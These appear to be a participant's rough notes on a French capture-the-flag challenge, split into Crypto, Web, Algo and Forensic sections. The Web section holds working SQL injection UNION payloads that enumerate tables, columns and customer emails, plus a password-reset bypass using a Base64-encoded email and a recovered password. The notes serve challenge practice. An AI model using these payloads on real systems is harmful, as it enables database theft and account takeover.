https://challengecybersec.fr/static/message-secret.html
https://challengecybersec.fr/chat/
=================================================================
Crypto:
------

=================================================================
Web:
---

- https://challengecybersec.fr/4e9033c6eacf38dc2a5df7a14526bec1/
- https://challengecybersec.fr/35e334a1ef338faf064da9eb5f861d3c/

SQLi => https://challengecybersec.fr/4e9033c6eacf38dc2a5df7a14526bec1/stock

* Liste tables => ' UNION SELECT table_name,1,2,3,4 FROM information_schema.tables#
* Liste colonnes de la table "customer" => ' UNION SELECT column_name,1,2,3,4 FROM information_schema.columns WHERE TABLE_NAME='customer'# 
* Liste emails => ' UNION SELECT email,1,2,3,4 FROM customer#

agent.malice@secret.evil.gov.ev

* B64 Password Reset => https://challengecybersec.fr/35e334a1ef338faf064da9eb5f861d3c/reset/YWdlbnQubWFsaWNlQHNlY3JldC5ldmlsLmdvdi5ldg==

Superlongpassword666
=================================================================
Algo:
----



=================================================================
Forensic:
--------

179.97.58.61

binwalk --extract --directory extracted/ evil_country_landscape.jpg
=================================================================
